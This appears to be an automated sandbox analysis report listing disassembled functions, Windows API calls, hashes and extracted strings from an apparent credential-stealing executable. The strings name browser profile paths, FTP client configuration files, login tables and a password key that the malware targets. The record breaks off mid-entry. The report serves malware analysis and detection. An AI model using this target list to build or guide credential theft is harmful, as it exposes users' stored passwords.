                                        • Instruction ID: 325d504d10b34896ea1b4c5fbaf62ac50bfbabd257eae12ccd877be6926cd799
                                        • Opcode Fuzzy Hash: 9120772f693959893bd55fbdc736b9a95cce8a02e990c7d9ff4710f1ec01c8f3
                                        • Instruction Fuzzy Hash: BB31E73190010CBADF216F51CD42FDD7ABABF10304F50C4BAB548B40E1DEB99A919F98
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409C62
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409CA7
                                          • Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
                                          • Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
                                          • Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
                                          • Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                                        • API String ID: 3007406096-624000163
                                        • Opcode ID: 5f7cb387843003fabdb9ef3f85ca44dbae65937a894153b483956116ca7aa95d
                                        • Instruction ID: b9d621fa176d9065a05f04eb54e4155592955927bec9dc1664df1bf6593da777
                                        • Opcode Fuzzy Hash: 5f7cb387843003fabdb9ef3f85ca44dbae65937a894153b483956116ca7aa95d
                                        • Instruction Fuzzy Hash: 54015EB46803087ADB117B61CC07FDA7A699B00748F11803ABA04750E3DAF9DED09A5D
                                        APIs
                                        • StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                          • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                          • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                          • Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
                                          • Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
                                          • Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
                                          • Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                                        • String ID: PathToExe
                                        • API String ID: 3012581338-1982016430
                                        • Opcode ID: ee6375be52fdd90e3ac22076838d9a0d238ff78f1c752865507c4382589fc59f
                                        • Instruction ID: 6cf34a47728be60588df2f0b0875d8187c8a2cf3b5933b17400dd404251cc3d6
                                        • Opcode Fuzzy Hash: ee6375be52fdd90e3ac22076838d9a0d238ff78f1c752865507c4382589fc59f
                                        • Instruction Fuzzy Hash: 3C31DB31940109BAEF11BFA1CC42EEE7E75BF04344F50443AB610B41F2DBB99A60AB69
                                        APIs
                                        • GetTempPathA.KERNEL32(00000104,?), ref: 00402674
                                        • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004026F6
                                        • GlobalLock.KERNEL32(?), ref: 00402702
                                        • GlobalUnlock.KERNEL32(?), ref: 00402724
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                          • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                          • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                          • Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
                                          • Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
                                          • Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
                                          • Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
                                        • String ID: Software\WinRAR
                                        • API String ID: 2536169780-224198155
                                        • Opcode ID: 9e909b1df8b367ba2edf9339469b90873308361c794d3207a948e00c31d30508
                                        • Instruction ID: c8bf2b1d8d6ff3924392204c1583eaa160c98ba1c68f5613f1a9897d3693f57a
                                        • Opcode Fuzzy Hash: 9e909b1df8b367ba2edf9339469b90873308361c794d3207a948e00c31d30508
                                        • Instruction Fuzzy Hash: CD21EB7590010DBBDF11BBA1CD86DDEBB69AF04348F1044B6B604F61F2D6BD8A94AB18
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00404664
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 0040469D
                                        • StrStrIA.SHLWAPI(?,Line), ref: 004046CE
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404753
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpenValue
                                        • String ID: Line
                                        • API String ID: 4012628704-1898322888
                                        • Opcode ID: a3ade369912dc51d8d70563a8441f0da65a209766a37348f98d8afa9ce308cc2
                                        • Instruction ID: 12ca7ed5bf862cbd5bc1baa86488653fd27923ee3fdb570bd1aa2b541a3cd975
                                        • Opcode Fuzzy Hash: a3ade369912dc51d8d70563a8441f0da65a209766a37348f98d8afa9ce308cc2
                                        • Instruction Fuzzy Hash: DB2127B580010CBACF21AB50CC41BEDBBB9BF41304F1085B6F605B50A0DBBA9B959F99
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E1BE
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E1F7
                                        • StrStrIA.SHLWAPI(?,.wjf), ref: 0040E23E
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E26B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpenValue
                                        • String ID: .wjf
                                        • API String ID: 4012628704-198459012
                                        • Opcode ID: 7f60c0cf3dcf63657f9e008a005949576ab99cfe9b63ec8ebcbc2bd73857eb15
                                        • Instruction ID: 635b00d09321aad8d0390620825c62aef4522b0aaa976ac0d3a633202ef0a810
                                        • Opcode Fuzzy Hash: 7f60c0cf3dcf63657f9e008a005949576ab99cfe9b63ec8ebcbc2bd73857eb15
                                        • Instruction Fuzzy Hash: 5711F93180410CFADF11AB91CC41FEEBBBDBF04304F0089B6A515B50A1DBB99BA59F99
                                        APIs
                                          • Part of subcall function 0040263E: GetTempPathA.KERNEL32(00000104,?), ref: 00402674
                                          • Part of subcall function 0040263E: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004026F6
                                          • Part of subcall function 0040263E: GlobalLock.KERNEL32(?), ref: 00402702
                                          • Part of subcall function 0040263E: GlobalUnlock.KERNEL32(?), ref: 00402724
                                        • CoCreateGuid.OLE32(?,00000000), ref: 004043D0
                                        • wsprintfA.USER32 ref: 00404417
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404423
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
                                        • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                        • API String ID: 1852535927-1100116640
                                        • Opcode ID: d69290c2852f38fe3840c2409b3cc238675d028e7aa4b29485f4ef02bda52cf0
                                        • Instruction ID: 5e87777bc5060c3288d1ddc94f92a97678ba2de14770e5ebdddae488d3891c5d
                                        • Opcode Fuzzy Hash: d69290c2852f38fe3840c2409b3cc238675d028e7aa4b29485f4ef02bda52cf0
                                        • Instruction Fuzzy Hash: 311139A68041987DDB61D2E64C11DFFBBFC5D0D345B5400ABBAA0E20C2D67D87409B38
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409CE9
                                          • Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                          • Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                          • Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                          • Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409D2E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectory$CloseEnumOpen
                                        • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                                        • API String ID: 3062143572-164276155
                                        • Opcode ID: 734100071180b503af968ed3d886ec7bad35816776fa679acc086782baa18d40
                                        • Instruction ID: 18527764d4d72b8fb970a98e15af5eb733511619ec58281b58f0f306d236f264
                                        • Opcode Fuzzy Hash: 734100071180b503af968ed3d886ec7bad35816776fa679acc086782baa18d40
                                        • Instruction Fuzzy Hash: 52F05430680208BECB11AF55CC47FCD7A699B44748F61C066B608750E3DBF9CAE49B4D
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D70
                                          • Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                          • Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                          • Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                          • Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409DB5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectory$CloseEnumOpen
                                        • String ID: Flock$Software\Mozilla$\Flock\Browser\
                                        • API String ID: 3062143572-1276807325
                                        • Opcode ID: 8b6780bfbdc0746c497a2fd31b1af50539d8cb091d52bcefd71787fea5f6ee35
                                        • Instruction ID: 43bcecda123058e56b32ec4d91b940529ca646ccc9c67ccf2eaae04472d4a507
                                        • Opcode Fuzzy Hash: 8b6780bfbdc0746c497a2fd31b1af50539d8cb091d52bcefd71787fea5f6ee35
                                        • Instruction Fuzzy Hash: EFF01D34780208BACB12AF51CC43FC97A6A9B04748F618166B608750E3DAB9CBD09B8D
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409DF7
                                          • Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                          • Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                          • Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                          • Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409E3C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectory$CloseEnumOpen
                                        • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                                        • API String ID: 3062143572-2716603926
                                        • Opcode ID: e7635e91d1c1a4b7b3a3a1702da752b1f4a217aba3b358ad1acf368ec54b1dd1
                                        • Instruction ID: 884d2f96a119383ee2cf1e37f627249cf192dde4241438316b10b3e49f4841a4
                                        • Opcode Fuzzy Hash: e7635e91d1c1a4b7b3a3a1702da752b1f4a217aba3b358ad1acf368ec54b1dd1
                                        • Instruction Fuzzy Hash: 80F01234680208BACB11BF51CC47FC97A669B04748F61806AB608750E3DEB9CAD49B8D
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409BAC
                                          • Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                          • Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                          • Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                          • Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409BF1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectory$CloseEnumOpen
                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                        • API String ID: 3062143572-2631691096
                                        • Opcode ID: 37b2ef04d0e7510d6e5f5d2405b0b8b7f0fe9fc4806781b49336eaf77225c1eb
                                        • Instruction ID: 45882fd607fb23ed2b64d1253c82e84c58dab58a3b1451fa118ebf952c8182a3
                                        • Opcode Fuzzy Hash: 37b2ef04d0e7510d6e5f5d2405b0b8b7f0fe9fc4806781b49336eaf77225c1eb
                                        • Instruction Fuzzy Hash: B2F01D74680308BACB11AF61CC43FC97A699B04748F618066B608750E3DAF9DAD09B5D
                                        APIs
                                        • StrStrIA.SHLWAPI(011B3E08,3D-FTP), ref: 0040C8AB
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                          • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                          • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
                                        • String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
                                        • API String ID: 1884169789-4074339522
                                        • Opcode ID: cd97c642866f50748b5627df96894bca937bb1cfb0bf794aac23756af397cf38
                                        • Instruction ID: d80121f027e36e181415908592f12f448330d6b9ebeaa5fc54ca2e2f13994c15
                                        • Opcode Fuzzy Hash: cd97c642866f50748b5627df96894bca937bb1cfb0bf794aac23756af397cf38
                                        • Instruction Fuzzy Hash: 63119470640101B9EB2137718C86FBE2E5A9B80748F50853FB914F51E6DABCDE81926C
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AD18
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AD4C
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AE34
                                          • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAD5
                                          • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAE8
                                          • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAFB
                                          • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB0E
                                          • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB21
                                          • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB34
                                          • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wsprintf$CloseEnumOpen
                                        • String ID: SiteServers
                                        • API String ID: 1693054222-2402683488
                                        • Opcode ID: b5be9dfb2b0f63a17abeaf029fb3e96679bf3fef23f808194cd3034a60cc03b9
                                        • Instruction ID: 8317cb43c360b6157995a82016f67b949468408628e18f08328f55d71d6d284c
                                        • Opcode Fuzzy Hash: b5be9dfb2b0f63a17abeaf029fb3e96679bf3fef23f808194cd3034a60cc03b9
                                        • Instruction Fuzzy Hash: 6131E031C0021CEADF21AB50CD41BDDBBBABF04305F54C0B6B148711A1CB795BA69F9A
                                        APIs
                                        • GetHGlobalFromStream.OLE32(?,?), ref: 004017CD
                                        • GlobalLock.KERNEL32(?), ref: 004017E8
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • GlobalUnlock.KERNEL32(?), ref: 00401846
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 00401855
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$Local$AllocFreeFromLockStreamUnlock
                                        • String ID: PKDFILE0YUICRYPTED0YUI1.0
                                        • API String ID: 1329788818-258907703
                                        • Opcode ID: f8bb7a0ff8973e21c828047d443a4022b30c66e91bb5de1119b795e99b1afc2e
                                        • Instruction ID: 0f424eb68057af49765608e2433f5076451fae3c9a9c6c9a3c844951889144b3
                                        • Opcode Fuzzy Hash: f8bb7a0ff8973e21c828047d443a4022b30c66e91bb5de1119b795e99b1afc2e
                                        • Instruction Fuzzy Hash: A721EDB2D00109BBDF017FA1CC42AAD7E75EF14344F10817ABA14B51B1E77A9B619B98
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408B6B
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408B9F
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C3E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: MRU
                                        • API String ID: 1332880857-344939820
                                        • Opcode ID: e0065033d19b889746ee12682f53e5ffbda9088b4be23686f46e2ffa5439fd76
                                        • Instruction ID: 7a6d8f74823b480fdcef130df1ea023501839c472418de0c71100c79f9f545c2
                                        • Opcode Fuzzy Hash: e0065033d19b889746ee12682f53e5ffbda9088b4be23686f46e2ffa5439fd76
                                        • Instruction Fuzzy Hash: 9521293180010CBADF21AF51CD42FDDBBBABF00304F1085BAB548B51A1DBB99B919F99
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401B19
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401B34
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401B6A
                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401B8C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: QueryValue$CloseOpen
                                        • String ID:
                                        • API String ID: 1586453840-0
                                        • Opcode ID: f380ec298d3e7d0e7bb2719177cca8e66ea60fdd4146e6aa69eb770d0516df7b
                                        • Instruction ID: 4dafb1f052c8dde12143e590320f2d7fd46cce7fa02554cd8ebf7238d74450ed
                                        • Opcode Fuzzy Hash: f380ec298d3e7d0e7bb2719177cca8e66ea60fdd4146e6aa69eb770d0516df7b
                                        • Instruction Fuzzy Hash: 46214B31A00109EEDF119E94CD82FEF7BB9EB81358F104176F900A61B0E778AA91DB59
                                        APIs
                                        • lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BC74
                                        • lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 0040BCA9
                                          • Part of subcall function 0040B922: StrStrIA.SHLWAPI(?,() ), ref: 0040B932
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmplstrcmpi
                                        • String ID: logins$table
                                        • API String ID: 3524194181-3800951466
                                        • Opcode ID: 822f00db3de998862b9e7dc8475a2ee5e58da838fccea6e16635eeb49d5e38bb
                                        • Instruction ID: f643828713e7ccc4d29c7f764fe84bdc2b67d615cd256a1447e30655ba0c606e
                                        • Opcode Fuzzy Hash: 822f00db3de998862b9e7dc8475a2ee5e58da838fccea6e16635eeb49d5e38bb
                                        • Instruction Fuzzy Hash: 8031D579800209FACF21EF90CC55ADEBB79EF04324F10827BA624B11E0D7799A549B98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: "password" : "
                                        • API String ID: 0-2310853927
                                        • Opcode ID: 690feedc7829ebbb85806371f7e8c01c07bdbc92840d4c8cd1c9171ad597f43e
                                        • Instruction ID: c3ebef3399e8fdb68a5e01a868bf6b84610cbe8615c69148f54c6662ba108e4c
                                        • Opcode Fuzzy Hash: 690feedc7829ebbb85806371f7e8c01c07bdbc92840d4c8cd1c9171ad597f43e
                                        • Instruction Fuzzy Hash: 33218E32800109BECF11ABA1CC02DEF7E65AF55344F114537F905B51A1D6794EA1E7E9
                                        APIs
                                        • wsprintfA.USER32 ref: 0040D140
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeLocalwsprintf
                                        • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                                        • API String ID: 988369812-376751567
                                        • Opcode ID: 8cdd718ba8be59cf09248816c28fc2046a3b3dcf2c2ac50665ecf6a847215371
                                        • Instruction ID: 21daa89d25b12e3a4bbf04d863efc35a619988afc870b97fe70358e5ad2946eb
                                        • Opcode Fuzzy Hash: 8cdd718ba8be59cf09248816c28fc2046a3b3dcf2c2ac50665ecf6a847215371
                                        • Instruction Fuzzy Hash: C8012171D00109BADF11BAD0CC82EEE7A79AB00304F508577B410B51E1DBBD9B999669
                                        APIs
                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401226
                                        • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040124A
                                        • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401256
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleRead
                                        • String ID:
                                        • API String ID: 1035965006-0
                                        • Opcode ID: a998e206f71e74847a2e32911413f759f32608bad605252caca5bd1b26f11fae
                                        • Instruction ID: aed9a798a82424e29e86fb4d6860d5487fec7a9f4572c56382ed939f2aa806a9
                                        • Opcode Fuzzy Hash: a998e206f71e74847a2e32911413f759f32608bad605252caca5bd1b26f11fae
                                        • Instruction Fuzzy Hash: 08F0F931A4010CBAEF22AB61DC02FDDBA79AB24749F1080A6B554F40E0D7B99BD99B14
                                        APIs
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401D23
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401D58
                                        • *LA, xrefs: 00401D3C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
